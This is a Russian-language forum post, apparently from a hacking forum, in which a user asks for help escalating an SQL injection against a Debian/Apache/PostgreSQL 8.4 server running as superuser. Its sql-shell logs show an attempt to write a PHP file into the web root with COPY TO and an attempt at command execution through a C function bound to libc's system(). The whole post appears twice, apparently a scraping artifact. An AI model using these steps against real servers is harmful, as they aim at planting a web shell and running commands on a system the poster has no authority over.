ACat
24.03.2017, 23:20
Всем доброго времени суток.
Решил, что эта ситуация тянет на отдельный топик :3
И так, задача:
linux Debian 4.4.5-8, 64-bit
Apache/2.2.16 (Debian)
PostgreSQL 8.4.13
Code:
SELECT usename, usecreatedb, usesuper, usecatupd FROM pg_user
postgres, true, true, true
Code:
SELECT mycol FROM mytable limit 1
''
Code:
sql-shell> COPY mytable (mycol) TO '/var/www/landing/Utils/Common/vendor/php-curl-class/php-curl-class/1.php';
[13:12:07] [INFO] fetching SQL query output: 'COPY mytable (mycol) TO '/var/www/landing/Utils/Common/vendor/php-curl-class/php-curl-class/1.php''
[13:12:07] [INFO] retrieving the length of query output
[13:12:07] [INFO] retrieved:
[13:12:08] [INFO] retrieved:
sql-shell>
Not Found
The requested URL /landing/Utils/Common/vendor/php-curl-class/php-curl-class/1.php was not found on this server.
Смею предположить, что нету прав на запись от юзера базы данных в папочки юзера веб-сервера.
Пробуем code exec:
Code:
sql-shell> CREATE OR REPLACE FUNCTION system(cstring) RETURNS int AS '/lib/libc.so.6', 'system' LANGUAGE 'C' STRICT;
CREATE OR REPLACE FUNCTION system(cstring) RETURNS int AS '/lib/libc.so.6', 'system' LANGUAGE 'C' STRICT;: 'NULL'
sql-shell> SELECT system('id');
[13:17:35] [INFO] fetching SQL SELECT statement query output: 'SELECT system("id")'
[13:17:36] [INFO] retrieving the length of query output
[13:17:36] [INFO] retrieved:
[13:17:36] [INFO] retrieved:
sql-shell>
Еще на сервере в открытом доступе лежат php-curl-class если это может как-то помочь.
Решил, что эта ситуация тянет на отдельный топик :3
И так, задача:
linux Debian 4.4.5-8, 64-bit
Apache/2.2.16 (Debian)
PostgreSQL 8.4.13
Code:
SELECT usename, usecreatedb, usesuper, usecatupd FROM pg_user
postgres, true, true, true
Code:
SELECT mycol FROM mytable limit 1
''
Code:
sql-shell> COPY mytable (mycol) TO '/var/www/landing/Utils/Common/vendor/php-curl-class/php-curl-class/1.php';
[13:12:07] [INFO] fetching SQL query output: 'COPY mytable (mycol) TO '/var/www/landing/Utils/Common/vendor/php-curl-class/php-curl-class/1.php''
[13:12:07] [INFO] retrieving the length of query output
[13:12:07] [INFO] retrieved:
[13:12:08] [INFO] retrieved:
sql-shell>
Not Found
The requested URL /landing/Utils/Common/vendor/php-curl-class/php-curl-class/1.php was not found on this server.
Смею предположить, что нету прав на запись от юзера базы данных в папочки юзера веб-сервера.
Пробуем code exec:
Code:
sql-shell> CREATE OR REPLACE FUNCTION system(cstring) RETURNS int AS '/lib/libc.so.6', 'system' LANGUAGE 'C' STRICT;
CREATE OR REPLACE FUNCTION system(cstring) RETURNS int AS '/lib/libc.so.6', 'system' LANGUAGE 'C' STRICT;: 'NULL'
sql-shell> SELECT system('id');
[13:17:35] [INFO] fetching SQL SELECT statement query output: 'SELECT system("id")'
[13:17:36] [INFO] retrieving the length of query output
[13:17:36] [INFO] retrieved:
[13:17:36] [INFO] retrieved:
sql-shell>
Еще на сервере в открытом доступе лежат php-curl-class если это может как-то помочь.